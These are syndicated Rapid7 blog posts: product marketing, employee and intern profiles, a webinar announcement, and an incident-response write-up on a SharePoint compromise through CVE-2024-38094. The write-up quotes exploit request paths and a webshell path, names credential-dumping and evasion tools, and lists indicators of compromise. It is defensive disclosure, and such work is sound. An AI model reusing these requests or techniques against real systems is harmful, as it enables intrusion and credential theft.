By deeply integrating cloud risk context from our industry-leading CNAPP capabilities into the incident response workflow, our MDR analysts are equipped with environmental awareness needed to act more quickly on your behalf to stop attackers in their tracks.

Rapid7 MXDR eliminates the need for piecemeal tools and processes by delivering end-to-end security services that combine AWS-native telemetry with cross-platform intelligence. The result is comprehensive threat detection and mitigation across your AWS environments without the complexity of managing multiple tools, providing:

  • Cloud Attack Surface Visibility and Advanced Threat Detection: Correlating AWS telemetry with global threat intelligence to build a dynamic map of your environment, uncover sophisticated attacks and spot avenues for lateral movement.
  • Continuous Coverage and Proactive Threat Hunting: Lean on our team of seasoned SOC experts who monitor, triage, and respond to incidents in real time, reducing operational burden.
  • Visibility into Cloud Identities, Their Permissions and Privileges: Monitor all cloud accounts and identities and proactively spot anomalous and potentially malicious user behavior, privilege escalations, or unusual API calls.
  • AI-Assisted Triage with Risk-Aware Context: Automatic context enrichment for cloud alerts with the relevant information SOC analysts need to understand the posture of a compromised account or resource and prioritize response.

Take Command of Your AWS Security Today

Whether you’re protecting critical workloads or responding to active threats, Rapid7 MXDR enables organizations to secure their AWS environments with confidence. From continuous monitoring to expert response, Rapid7 ensures your AWS assets remain protected while allowing your team to focus on driving business innovation.

Contact Rapid7 today to see how MXDR can elevate your AWS security posture.

Rapid7 Recognized for ‘Excellence in Workplace Health and Wellbeing’ at the Belfast Telegraph IT Awards

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/11/19/rapid7-recognized-for-excellence-in-workplace-health-and-wellbeing-at-the-belfast-telegraph-it-awards/

Rapid7 Recognized for ‘Excellence in Workplace Health and Wellbeing’ at the Belfast Telegraph IT Awards

On Friday, November 15th, Rapid7 was awarded ‘Excellence in Workplace Health and Wellbeing’ at the Belfast Telegraph IT Awards. This award recognizes technology companies in Belfast that prioritize employee well-being.

At Rapid7, we believe that the best ideas and solutions come from diverse, multi-faceted teams. By supporting our people with programs that enhance their well-being and quality of life, we create an environment where they can continue to have rewarding career experiences and make an incredible impact on our business. Our programs go beyond just taking care of people when they are sick. Instead, we look to increase their overall quality of life with unique initiatives and offerings that support both physical and mental health and wellness.

Our award submission was broken down into three key areas where we offer unique benefits that make us leaders in our field. These areas included benefit offerings, physical health and well-being, and mental health and well-being.

Benefit Offerings

Rapid7 is proud to offer unique and competitive benefits to employees and their families. One example is our neurodiversity coverage. Employees at Rapid7, and their family members, have access to specialists for evaluations, screenings, and treatment programs. Appointments and services that would otherwise take months or years are able to happen within weeks.

As part of our health benefit program, once a year, our company participates in a global health and well-being challenge. This is not your typical ‘steps’ challenge, but instead a comprehensive initiative encompassing physical activity, meditation, and mindfulness, designed to build connections across Rapid7 teams.

Physical health and well-being

Our cycle-to-work scheme allows employees to set aside a salary sacrifice to purchase a new bicycle. There is no maximum limit so our employees are often able to select high-end models at an affordable rate. Employees drop in and out of the program as they wish, and this year we have 16 employees saving up to get their new bikes.

For those who prefer a gym or fitness classes, our Chichester street office building is equipped with a full service gym featuring cardio and weight training equipment, as well as a yoga and group fitness studio. The fitness studio has a variety of virtual program on demand, many of which can be completed in just 20 minutes, making it easy for employees to fit in a quick break during their day.

Mental health and wellbeing

AwareNI is a local organization that we’ve been proud to partner with. We participate in their mood matters program, bringing mental health awareness and training to employees across Rapid7. However, what is most unique is our on-site mental health first aiders. We partner with AwareNI to train employees to be on-site mental health first aiders, giving employees a resource in the office to go to if they are experiencing a mental health crisis. As mental health first aiders, these employees are equipped with the skills and knowledge to guide and support colleagues experiencing a mental health-related crisis.

At Rapid7, we are on a mission to create a secure digital world for our customers, our industry, and our communities. We show up every day to keep our 11,000+ customers around the world protected from the latest threats. This requires us to build a dynamic workplace where innovation and collaboration thrive. Taking care of our people is a critical first step, and we’re honored to have been recognized as a leader in this space. To learn more, please visit our careers site at careers.rapid7.com.

New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/11/15/new-idr-log-search-enhancements-accelerate-streamline-and-simplify-investigations/

Co-authored by Ed Montgomery & René Fusco, Rapid7

New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations

In today’s cybersecurity landscape, organizations need robust detection and response solutions to stay ahead of evolving threats. Rapid7’s InsightIDR, the foundation of our Managed Detection and Response (MDR) service, empowers security teams with advanced analytics, automation, and expert-led investigations. Whether used as a standalone SIEM and XDR platform or in combination with MDR, InsightIDR’s latest Log Search enhancements bring even more value  across the board. These updates accelerate response times, simplify complex queries, and improve the investigation process for both our MDR clients and product-only customers.

These updates, including Simplified Query Building, Pre-Computed Queries, and Bloom Filters, enhance the speed, accuracy, and accessibility of log search for security teams, ensuring faster, more targeted threat investigations for organizations.

Let’s explore how these updates elevate the detection and response lifecycle.

Simplified Query Building: Empowering Analysts to Act Faster

A key element of any detection and response solution is the ability to quickly turn data into actionable insights. Simplified Query Building enables analysts to construct and refine log searches faster, without complex syntax or technical details. This user-friendly interface enables any InsightIDR user, regardless of technical expertise, to create advanced queries through point-and-click prompts, accessing critical data quickly to streamline investigations.

By lowering the barrier to creating queries, Simplified Query Building provides organizations with timely, data-backed insights into incidents, reducing investigation time for both Rapid7’s MDR team and InsightIDR customers. This update ensures that every security team member, regardless of tenure, can access and leverage the power of InsightIDR’s log data without becoming bogged down by technical complexities.

New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations
InsightIDR – Simplified Query Building

Pre-Computed Queries: Reducing Time-to-Response for All Investigations

Time is critical when it comes to threat response.With Pre-Computed Queries (PCQs), both MDR and product-only customers benefit from reduced log search times. PCQs enable predictably fast, near-instant access to insights by pre-calculating query results in real-time as data arrives, enhancing responsiveness for all InsightIDR users.

Customer Feedback

“As an MSSP, InsightIDR’s ability to handle large amounts of data is key for identifying threats in our client environments. Pre-Computed Queries have reduced return times for complex searches by over 70%, allowing us to create more impactful insights for our clients.”

— Mat Cornish, Technical Director, Longwall Security

While InsightIDR already supports saving queries for reuse, PCQs take it further by pre-computing results, helping analysts to instantly identify patterns or gather evidence. Additionally, the Log Search home tab organizes queries by “Recent,” “Saved,” and “Pre-computed,” enabling users to quickly find what they need for streamlined incident handling. Whether you’re a customer conducting an in-house investigation or part of Rapid7’s MDR team, PCQs ensure faster insights and more efficient incident response.

New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations
InsightIDR – Pre-Computed Queries

Bloom Filters: Accelerating Key Value Pair Searches for Precise Threat Hunts

Not all queries can be pre-calculated in advance. Security teams are frequently asked questions about potential exposure to specific indicators of compromise (IoCs), such as flagged IP addresses or hash values. With Bloom Filters, both MDR and product-only customers gain a performance boost in search time for precise threat hunts by reducing unnecessary data processing.

For exact match searches, like identifying a compromised IP address or hunting for a suspicious hash value where(hash.sha=”…”), Bloom Filters optimize search time by ruling out irrelevant data – enabling the algorithm to skip logs that would not have matches. This enhancement is implemented on the backend and occurs automatically for any search that contains an exact match key-value pair. Reducing the search space means accelerating analysts’ ability to hone in on the exact information they need, cutting down investigation time dramatically.

A recent research effort into InsightIDR’s new indexing approach, which leverages Bloom Filters, showed impressive results with:

  • Improved Efficiency: Approximately 40-60% of all searches have experienced noticeable speed improvements since deployment.
  • Increased Precision: The new index has enabled applicable queries to skip irrelevant data three to four times more effectively, leading to shorter search durations for even more efficient investigations.

Bringing It All Together: Faster, More Effective Detection and Response

Whether you’re a Rapid7 MDR customer or an InsightIDR product-only user, these Log Search updates significantly enhance detection and response capabilities. By reducing search times, simplifying complex queries, and pinpointing threats with greater accuracy, we provide every InsightIDR user with faster, more effective security outcomes.

This means:

  • Faster Detection: Pre-Computed Queries and Bloom Filters accelerate search processes, enabling quicker response to incidents across both MDR and product-only use cases.
  • Improved Visibility: Simplified Query Building ensures analysts can quickly refine searches and access the data needed for comprehensive investigations.
  • Targeted Threat Hunts: Optimized key-value pair searches focus on the most relevant data, delivering quicker results for security teams.

Want to see these improvements in action? Contact us today to learn how Rapid7’s MDR service can protect your organization. You can also try InsightIDR for free with a 30-day trial.

Cathal O’Neill – Taking Command of Your Career in Tech

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/11/07/cathal-oneill-taking-command-of-your-career-in-tech/

Cathal O’Neill - Taking Command of Your Career in Tech

Cathal O’Neill joined Rapid7 in 2023 as a Senior Engineering Manager, and he has since advanced to the role of Engineering Director. Reflecting on his career path, he says,“My journey into senior management has been a continual evolution, driven by both personal development and the desire to lead challenging technical projects.”

Cathal credits the experiences for paving a path of continuous growth and development. Beginning his career as an intern and moving through roles from engineer to team leader, he notes, “Through each role, I’ve gained deeper insights into the technical, managerial, and strategic aspects of technology leadership. As I navigated these roles, only then did I understand the scale at which software solutions need to operate and evolve.”

We asked what his key to success was, and he shared what he sees as three critical ingredients for taking command of your career in tech:

  • Feedback
  • Connections
  • Continuous Learning

Below, Cathal delves into each principle and offers resources and practical tips that have helped him along the way.

Feedback

“I often hear that feedback is a gift. This is something I know to be true today, but it took me a while to realise what this really meant, and get comfortable with it. Early in my career, I would get constructive feedback and feel defensive or try to prove that it wasn’t true. Once I started to embrace feedback and use it as an opportunity to learn, I was able to navigate challenges much more efficiently, and become a better leader for my team. Looking back, every major milestone in my career was shaped by feedback from team mates, managers and mentors.”

“Feedback is most effective when built on mutual trust. Early on, a mentor recommended Radical Candor, a book by Kim Scott that emphasises the importance of relationships in delivering constructive feedback. I’ve applied its principles to give and receive feedback in ways that feel authentic and lead to productive outcomes. The Software Engineering Guidebook by Gergely Orosz is another one that I have recently been reading, and using to frame my feedback and guidance to my teams. Orosz dives into both the technical aspects of the software roles, as well as providing advice on how to work within an organisation.”

Recommendation:

Connections

“As I navigate different situations, I’ve found myself very lucky to have a number of strong people around me who lean in to help me succeed. Whether it’s offering advice, critical or positive feedback, or “rubber ducking” with me (which I’ve found not just to be useful when debugging code!), these connections continue to shape my development today.

When building your network, I recommend:

  • Being intentional: Aim to build relationships with people whose experiences and career paths you value, as opposed to trying to grow your network for the sake of it.
  • Engaging thoughtfully: Do the groundwork to understand someone’s background and ask specific, meaningful questions. Genuine curiosity often forms the foundation of strong professional relationships.
  • Following up: Maintaining relationships requires effort. A quick message to check in, a note on how their advice helped, or a casual coffee catch-up can strengthen these connections over time.”

Continuous Learning

“Learning happens in many forms—through formal programs or hands-on experiences—and is something we feel very passionately about at Rapid7, as it relates to our core value of ‘Never Done.’ Shortly after joining, I participated in the Manager Bootcamp, which laid the foundation for understanding Rapid7’s leadership expectations. Later, I joined the Amplify program, which provides 360-degree reviews and insights from senior leaders, including our CEO, Corey Thomas. As I went through the Amplify programme, I read ‘Scaling people: tactics for management and company building, by Claire Hughes Johnson. This book helped reinforce concepts I was learning and is one that I would recommend to anyone in a leadership role.

Outside of these formal programmes, learning is embedded into our everyday culture and how we operate as a global company. In the Cloud Security engineering teams, we have lunch and learn sessions, show and tells, and have recently launched cloud technology and cloud security training, which cover the various cloud providers and industry certifications. At Rapid7, we are open to giving people stretch assignments or leaning in on new projects that relate to an area or topic they are interested in and want to learn more about. If you want to do something different or specialise in another area of the business, you don’t need to leave the company to find those opportunities. Having learning be tied to our culture enables internal mobility and growth in a way that is really unique.”

Recommended:

“These books have enriched my understanding of tech leadership, offering new perspectives on challenges I’ve faced and reinforcing essential concepts. While on the job training provides a tremendous opportunity to grow, seeking out additional content is also part of continuous learning. Some of these books cover content that I “know already” but help frame it differently or serve as a reminder of the foundations as my role has evolved. Revisiting these resources periodically helps me stay grounded as I navigate day-to-day challenges, and I’m always on the lookout for new resources to learn from.”

Conclusion: Cultivating Growth at Rapid7

As he reflects on his path, Cathal emphasises how Rapid7 fosters a culture of growth, allowing employees to take active ownership of their career trajectories.

“Before joining Rapid7, I heard a lot about the company’s culture. After nearly three years, I can say it truly sets Rapid7 apart. People here focus not just on their own success but on the success of their colleagues and the collective. This environment fosters trust, encourages open feedback, and provides unique learning experiences—all of which make Rapid7 a place where careers can thrive.”

For those interested in joining the Rapid7 team, you can explore opportunities on our careers page or view all open roles here.

20/20 Cybersecurity: Lessons Learned in 2024 and Strategies for a Stronger 2025

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/11/04/20-20-cybersecurity-lessons-learned-in-2024-and-strategies-for-a-stronger-2025/

20/20 Cybersecurity: Lessons Learned in 2024 and Strategies for a Stronger 2025

With 2024 rapidly coming to a close, many of us here at Rapid7 are taking a step back, reflecting upon the successes and learnings of the last 12 months, and looking ahead to the challenges and opportunities we could jointly face in the year ahead. Of course, we are doing the same for our customers.

For cybersecurity practitioners, 2024 has been nothing short of a rollercoaster ride. As organizations continue to embrace digital transformation at an accelerated pace, the security landscape has shifted, forcing security teams to confront new threats on top of the old and adjust their strategies in real-time.

This year, more than any other, it feels like we’ve witnessed the perfect storm that will forever reshape our industry. Supply chain incidents, sophisticated ransomware attacks, and a global IT outage disrupted critical infrastructure and affected organizations across all sectors and geographies. That’s on top of the backdrop of some of the biggest public data breaches we’ve ever seen. It’s a stark reminder of the ongoing vulnerability of sensitive data and the escalating cost of breaches.

Beyond these headline-grabbing incidents, cybersecurity teams have contended with a growing attack surface driven by the proliferation of IoT devices, an uptick in cloud adoption, and the increasing interconnectivity of systems. Threat actors have capitalized on this complexity, launching more sophisticated, multi-stage attacks that challenge even the most mature security operations centers (SOCs). The sheer volume and diversity of attacks have made it clear: This is not a game of adding more tools to the stack but of refining strategies, fortifying defenses, and focusing on cybersecurity fundamentals.

The Year of Operational Strain and Strategic Reassessment

As cyber threats grew more pervasive and intricate, the demands on security teams reached a breaking point. The year was marked by operational strain, with SecOps teams pushed to their limits to defend against an onslaught of increasingly complex threats. For many organizations, resource constraints — both in terms of personnel and budgets — further compounded the issue, leading to a reactive stance rather than a proactive one. This environment has necessitated a strategic reassessment of how we approach security.

The reality is stark: In 2024, many security professionals found themselves spending more time chasing alerts and parsing through logs than addressing core security challenges. This operational burden has impacted efficiency, morale, and ultimately, the effectiveness of security measures.

Yet, amidst these challenges lies a critical insight. Empowering teams with the right knowledge, tools, and support can dramatically transform outcomes. Security leaders must take command, refocusing on strategies that foster collaboration and transparency while building resilience against a dynamic threat landscape.

Empowering Teams: A New Approach for 2025

Heading into 2025, the need for a shift in approach has never been clearer. This is not merely about layering more technology into an already complex environment. It’s about establishing a partnership that empowers teams to confidently anticipate, pinpoint, and act against threats with precision and clarity. When security professionals are equipped with the right data and expertise, they can reduce the noise, eliminate inefficiencies, and spend more time addressing the strategic priorities that truly matter to their organizations.

Central to this strategy is fostering a culture of trust and collaboration between security teams and other business units. By breaking down silos and establishing shared goals, security leaders can ensure that everyone — from technical stakeholders to the C-Suite — is aligned on what success looks like and how it will be measured. This unified approach, underpinned by reliable data and transparent communication, is key to mitigating risk and optimizing security operations.

Join Us for the 2025 Security Predictions Webinar

To help the security community navigate these evolving challenges and prepare for what’s ahead, Rapid7 is once again hosting its annual 2025 Security Predictions webinar. Featuring our Chief Scientist, Raj Samani, and Vice President of Global Government Affairs and Public Policy, Sabeen Malik, this webinar will explore some of the most pressing issues facing the security community and provide valuable insights into how organizations can better position themselves for the future.

Reflecting on past discussions, we’ve tackled critical themes like talent shortages, public versus private information sharing, and the operationalization of security.

Plan for 2025 with Confidence

Our retrospective on 2024 might feel laden with challenges, yet there is an undeniable silver lining: A unified cybersecurity strategy is within reach. By breaking down organizational silos, fostering a shared vision, and empowering security teams to act with precision and clarity, organizations can take command of their security posture.

At Rapid7, we believe that clarity is power. As we look toward 2025, our mission is to provide that clarity and support, enabling organizations to anticipate, pinpoint, and act on threats with confidence. The lessons of 2024 have taught us that resilience and adaptability are paramount. Now is the time to capitalize on these learnings and put them into practice.

Register Now

Register today and save your seat. Let’s make 2025 the year we take command of the attack surface, reduce operational risk, and set the standard for proactive, efficient, and effective cybersecurity.

Investigating a SharePoint Compromise: IR Tales from the Field

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/10/30/investigating-a-sharepoint-compromise-ir-tales-from-the-field/

Executive summary

Investigating a SharePoint Compromise: IR Tales from the Field

Rapid7’s Incident Response team recently investigated a Microsoft Exchange service account with domain administrator privileges. Our investigation uncovered an attacker who accessed a server without authorization and moved laterally across the network, compromising the entire domain. The attacker remained undetected for two weeks. Rapid7 determined the initial access vector to be the exploitation of a vulnerability, CVE 2024-38094, within the on-premise SharePoint server.

Exploitation for initial access has been a common theme in 2024, often requiring security tooling and efficient response procedures to avoid major impact. The attacker’s tactics, techniques, and procedures (TTPs) are showcased in this blog, along with some twists and turns we encountered when handling the investigation.

Observed attacker behavior

Rapid7 began exploring suspicious activity that involved process executions tied to a Microsoft Exchange service account. This involved the service account installing the Horoung Antivirus (AV) software, which was not an authorized software in the environment. For context, Horoung Antivirus is a popular AV software in China that can be installed from Microsoft Store. Most notably, the installation of Horoung caused a conflict with active security products on the system. This resulted in a crash of these services. Stopping the system’s current security solutions allowed the attacker freedom to pursue follow-on objectives thus relating this malicious activity to Impairing Defenses (T1562).

Zooming out from the specific event to look at the surrounding activity paints a clear picture of the attacker’s intended goal. Shortly before installing Horoung AV, the attacker used Python to install Impacket from GitHub and then attempted to execute it. Impacket is a collection of open-source Python scripts to interact with network protocols, typically utilized to facilitate lateral movement and other post-exploitation objectives. The system’s security tooling blocked the Impacket execution, which led to the download via browser and installation of this AV product to circumvent defenses.

As with many incident response investigations, identified clues are not always chronological, thus requiring a timeline to be constructed to understand the narrative. We must attempt to discover how the attacker compromised the system or accessed the environment in the first place. In this specific investigation, the attacker had a dwell time of two weeks. The attacker’s actions are detailed chronologically in the figure below.

Investigating a SharePoint Compromise: IR Tales from the Field
Figure 1: MITRE Timeline

A great resource for identifying lateral movement involves analysis of authentication event logs from the domain controllers, specifically event ID 4624. Evidence indicated that malicious activity for this compromised Exchange service account involved more than just this single system. The source of unauthorized activity went back a week prior on a domain controller.

Analysis of the domain controller revealed that the attacker used this Exchange service account to authenticate via Remote Desktop Protocol (RDP). The attacker went on to disable Windows Defender Threat Detection (WDTD) on the system and added an exclusion for a malicious binary called msvrp.exe using the GUI. The malicious binary was placed in the C:\ProgramData\VMware\ folder but was not related to VMware. This binary is a tool called Fast Reverse Proxy (FRP), which allows external access to the system through a NAT-configured firewall. The FRP tool requires an .ini file to provide the necessary network configuration to establish an outbound connection. The .ini file’s external IP address has been provided in the Indicators of Compromise (IoCs) table in this blog post. Persistence was established for the FRP via scheduled tasks on the domain controller. Review of the C:\ProgramData\VMware\ folder used by the attacker revealed additional malicious binaries such as ADExplorer64.exe, NTDSUtil.exe, and nxc.exe. These tools were utilized to map the Active Directory environment, gather credentials, and scan systems.

Further analysis of authentication events from the domain controller indicated this malicious activity was sourced from a public-facing SharePoint server. Evidence indicated that the attacker executed Mimikatz, and there were signs of log tampering on the SharePoint server. It also indicated that a majority of system logging was disabled, and several key event log sources were absent during the investigation timeframe. Mimikatz has the ability to clear event logs and disable system logging. These malicious executions were tied to the local administrator account on the system. This would provide the necessary privileges for log tampering on the SharePoint server. However, some logs were spared, such as RDP log evidence. This indicated all authentication for the local administrator account was sourced from the local system to the local system during the in-scope time frame. The authentication information indicated that the potential initial access vector (IAV) would be tied to this SharePoint server. In light of this evidence, Rapid7 dug deeper into potential exploitation of the SharePoint services for an answer.

Rapid7 reviewed available SharePoint inetpub logs and identified the following GET and POST requests indicative of CVE-2024-38094 being exploited from the external IP address 18.195.61[.]200.

POST /_vti_bin/client.svc/web/GetFolderByServerRelativeUrl('/BusinessDataMetadataC atalog/')/Files/add(url='/BusinessDataMetadataCatalog/BDCMetadata.bdcm 
			
POST /_vti_bin/DelveApi.ashx/config/ghostfile93.aspx

This vulnerability allows for remote code execution (RCE) on systems running Microsoft SharePoint from an external source. The proof-of-concept (PoC) code identified here was observed in available SharePoint log evidence. A great resource that explains the PoC code on Github can be found here. Utilizing this vulnerability, the attacker dropped a webshell on the system. The webshell was called ghostfile93.aspx, which generated numerous HTTP POST requests from the same external IP address tied to the exploit string within log evidence. After several hours of using the webshell, the attacker authenticated into the system using the local administrator account.

Initial access occurred two weeks prior to the start of the investigation. The attacker performed other notable TTPs during the dwell time. These TTPs involved utilizing several binaries to include everything.exe, kerbrute_windows_amd64.exe, 66.exe, Certify.exe, and attempts to destroy third-party backups. The binary everything.exe can index the NTFS file system for efficient searching across files, such as recently used files and network shares. Some of the most notable binaries include 66.exe, a renamed version of Mimikatz, and Certify.exe, which creates an ADFS certificate to utilize for elevated actions within the Active Directory environment. The remaining binary kerbrute_windows_amd64.exe has extensive capability for brute-forcing Active Directory Kerberos tickets. The attacker failed to compromise the third-party backup solution but attempted multiple methods, including access via the browser using compromised credentials and connecting over SSH.

As discussed previously, the installation of external AV products to disable security tooling was an interesting TTP identified during this investigation. Shortly after being blocked for attempted Impacket execution, Rapid7 identified the attacker leveraging an installation batch script called hrsword install.bat. The contents of this script indicate that the Huorong AntiVirus (AV) security solution was being installed. This script involved a service creation called sysdiag to execute the driver file sysdiag_win10.sys, which creates a VBS script execution parameter to execute HRSword.exe. Rapid7 observed this installation causing errors for security products on the system, potentially leading to a scenario in which the service or application would crash. These install files and all IOCs identified during this investigation have been provided in the IOC table contained within this blog.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to the Microsoft SharePoint CVE-2024-38094 with authenticated vulnerability checks added in the July 09, 2024 content release.

Rapid7 used Velociraptor during this investigation to allow for remote triage and collection of forensic artifacts on the endpoint. A Velociraptor artifact has been created to hunt for strings related to the public PoC and log evidence identified during the investigation. The artifact can be found within the Rapid7 Labs VQL Repo here

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to exploitation of this vulnerability.
Suspicious Commands Launched by Webserver
IIS Launching Discovery Commands
IIS Spawns PowerShell
Attacker Tool – Impacket
Attacker Tool – MimiKatz
Attacker Technique – Hash Dumping With NTDSUtil
Attacker Technique – Clearing Event Logs
Defense Evasion – Disabling Multiple Security or Backup Products

Rapid7 also recommends ensuring that SharePoint is patched to the latest version.

MITRE ATT&CK techniques

Tactic Technique Details
Initial Access Exploit Public-Facing Application (T1190) CVE-2024-38094: Microsoft SharePoint Remote Code Execution Vulnerability
Defense Evasion Impair Defense (T1562) AV solution being utilized to disable or degrade security tools on systems.
Discovery Account Discovery (T1087) Usage of AD enumeration tools
Command and Control Proxy (T1090) Fast Reverse Proxy being used to establish outbound connection
Discovery File and Directory Discovery (T1083) Everything.exe being observed on in-scope systems.
Discovery Network Share Discovery (T1135) nxc.exe being observed on in-scope systems.
Credential Access OS Credential Dumping (T1003) Various credential harvesting tools observed on in-scope systems
Persistence Scheduled Task/Job (T1053) Scheduled tasks observed on in-scope systems to execute the FRP tool.

Indicators of Compromise

Attribute Value Description
Filename and Path c:\users\Redacted\documents\everything-1.4.1.1024.x86\everything.exe Binary to locate files
SHA256 d3a6ed07bd3b52c62411132d060560f9c0c88ce183851f16b632a99b4d4e7581 Hash for everything.exe
Filename and Path c:\programdata\vmware\66.exe Renamed mimikatz.exe
SHA256 61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1 Hash for mimikatz.exe
Filename and Path c:\programdata\vmware\certify.exe Creates an ADFS certificate to utilize for elevated actions within the Active Directory environment.
SHA256 95cc0b082fcfc366a7de8030a6325c099d8012533a3234edbdf555df082413c7 Hash for certify.exe
Filename and Path c:\programdata\vmware\kerbrute_windows_amd64.exe Used to perform Kerberos pre-auth brute forcing.
SHA256 d18aa84b7bf0efde9c6b5db2a38ab1ec9484c59c5284c0bd080f5197bf9388b0 Hash for kerbrute_windows_amd64.exe
Filename and Path c:\programdata\vmware\msvrp.exe Fast Reverse Proxy tool for allowing external access to the system through a NAT configured firewall.
SHA256 f618b09c0908119399d14f80fc868b002b987006f7c76adbcec1ac11b9208940 Hash for msvrp.exe
Filename and Path c:\programdata\vmware\nxc.exe Newer version of the CrackMapExec Network Pentesting tool.
SHA256 95cc0b082fcfc366a7de8030a6325c099d8012533a3234edbdf555df082413c7 Hash for nxc.exe
Filename and Path c:\programdata\vmware\adexplorer64.exe Active Directory Enumeration Tool
SHA256 e451287843b3927c6046eaabd3e22b929bc1f445eec23a73b1398b115d02e4fb Hash for adexplorer64.exe
Filename and Path c:\users\Redacted\documents\h\hrsword install.bat Component of Huorong AV
SHA256 1beec8cecd28fdf9f7e0fc5fb9226b360934086ded84f69e3d542d1362e3fdf3 Hash for hrsword install.bat
Filename and Path c:\users\Redacted\documents\h\hrsword.exe Component of Huorong AV
SHA256 6ce228240458563d73c1c3cbbd04ef15cb7c5badacc78ce331848f5431b406cc Hash for hrsword.exe
Filename and Path c:\Windows\System32\drivers\sysdiag_win10.sys System driver component of Huorong AV
SHA256 acb5de5a69c06b7501f86c0522d10fefa9c34776c7535e937e946c6abfc9bbc6 Hash for sysdiag_win10.sys
Log-Based IOC POST /_vti_bin/client.svc/web/GetFolderByServerRelativeUrl(‘/BusinessDataMetadataC atalog/’)/Files/add(url=’/BusinessDataMetadataCatalog/BDCMetadata.bdcm POC code identified in SharePoint logs.
Log-Based IOC POST /_vti_bin/DelveApi.ashx/config/ghostfile93.aspx Webshell identified within SharePoint logs.
IP Address 54.255.89[.]118 IP address from .ini file for Fast Reverse Proxy tool
IP Address 18.195.61[.]200 Source IP address from exploitation and webshell communications

7 Rapid Questions on our Belfast Placement Programme: Orla Magee and Paddy McDermott

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/10/18/7-rapid-questions-on-our-belfast-placement-programme-orla-magee-and-paddy-mcdermott/

7 Rapid Questions on our Belfast Placement Programme: Orla Magee and Paddy McDermott

Ever wonder what it’s like to be an intern at Rapid7 in Belfast?

Software Engineers Orla Magee and Paddy McDermott share what the interview process looked like for them, along with impactful projects and advice for others exploring Rapid7’s Placement Programme.

What was the interview process like for the Placement Programme?

Paddy: The interview process for Rapid7’s Placement Programme was well structured and welcoming. It consisted of two parts, a one-on-one chat focusing on cultural alignment, and a technical interview with programming questions and a puzzle to solve. The interviewers were approachable, which helped me feel at ease. I felt as though they struck a good balance, assessing my skills without overwhelming me with information and questions. It felt like a genuine attempt to get to know me as a person and assess my skills, rather than just ticking boxes.

Orla: From the start, the talent acquisition team was friendly and communicative, keeping me well-informed about each stage. The interviewers seemed genuinely interested in getting to know me as a person, highlighting that being yourself is crucial in this process. Overall, the interview experience reflected positively on Rapid7’s commitment to finding well-rounded individuals who can contribute both technically and culturally to their team, which made me feel at ease and excited for an opportunity to work at Rapid7.

What initially stood out to you about Rapid7?

Paddy: What stood out to me about Rapid7 was the genuine connection I felt with the people I met during the interview process. The interviewers were engaging and approachable, which gave me a strong sense of the company’s collaborative culture. Another thing that caught my attention was Rapid7’s commitment to growing new talent. This became clear when I attended an event specifically for intern applicants, where I got to experience the company’s welcoming atmosphere firsthand. A mix of friendly people, a learning-focused environment and the opportunity for significant professional growth really made Rapid7 stand out as an ideal place to begin my career.

What was the learning curve like coming into Rapid7 as a student, and what resources or tools did you have to navigate that?

Orla: Transitioning from university to working at Rapid7 as a student came with a significant learning curve. In university, I was used to working independently on projects. At Rapid7, I had to adapt to collaborating as part of a team. This shift required developing my communication skills and learning to work effectively with others. Additionally, the codebase was much bigger and more complex than the smaller-scale projects I had worked on in university. To help navigate these challenges, I was paired with a mentor at the start of my internship, who was instrumental in developing my technical abilities and helping me adjust to working in a professional environment. Alongside my mentor, my team members were always willing to offer assistance and guidance, creating a supportive atmosphere that facilitated my learning and growth. This combination of mentorship and team support was crucial in helping me overcome the learning curve and successfully adapt to a new work environment.

Can you share a memorable project or experience?

Paddy: One of my most memorable achievements during my placement was developing a full-stack status page. This project was particularly significant as it served a real, practical purpose within the company. The status page I created was designed to alert on outages and display the health of various components of our team’s pipeline. This tool was used beyond our team, and was shared internally across different parts of the company. This project allowed me to greatly expand my full-stack development skills in a meaningful way. It was rewarding to see something I built from the ground up being actively used to improve monitoring and communication about our pipeline’s status.

What advice would you give someone looking to land a Placement with Rapid7?

Orla: Take advantage of intern nights, held at the office, as these events offer a unique glimpse into Rapid7’s culture and team dynamics. These events are great opportunities to network and build connections with current staff members, potentially giving you an insider’s perspective on the company.

Paddy: My main advice would be to be yourself throughout the whole process as this will really   help you connect with the interviewers and showcase your true potential. Also, make sure to demonstrate a strong willingness to learn, as Rapid7 values candidates who are eager to grow and take on new challenges.

What were some of your biggest fears coming in, And how did that compare to reality?

Orla: When I started my internship at Rapid7, my main concern was that my technical skills might not measure up to those of my peers. I worried about potentially struggling to contribute meaningfully to the team, but my real experience showed that these worries were unnecessary. From day one, I was met with a welcoming and supportive environment. My colleagues were not only understanding of my position as an intern but were also genuinely enthusiastic about helping me develop my skills. They took the time to walk me through their current projects, providing valuable context and insights that helped me quickly get up to speed. My initial uncertainty was replaced with excitement for the opportunity to learn and contribute, and the reality of the internship far exceeded my expectations.

How has your placement experience prepared you for a successful career?

Paddy: Overall, the placement has given me a mix of technical growth, hands-on experience and professional development creating a strong foundation for my future in tech. I’ve learned many new programming languages with guidance from experienced colleagues. Working in a live production environment has equipped me with real-world skills and experiences. Presenting demos has boosted my confidence in public speaking and taught me how to communicate technical concepts effectively. I’ve built connections and friendships with coworkers which has made the work environment enjoyable and allowed me to start to form a professional network that will be valuable in my career.

Interested in learning more about the Placement Programme, or additional emerging talent programmes at Rapid7? Click here to explore our offerings and view open jobs.

Root Access for Data Control: A DEF CON IoT Village Story

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/10/16/root-access-for-data-control-a-def-con-iot-village-story/

Root Access for Data Control: A DEF CON IoT Village Story

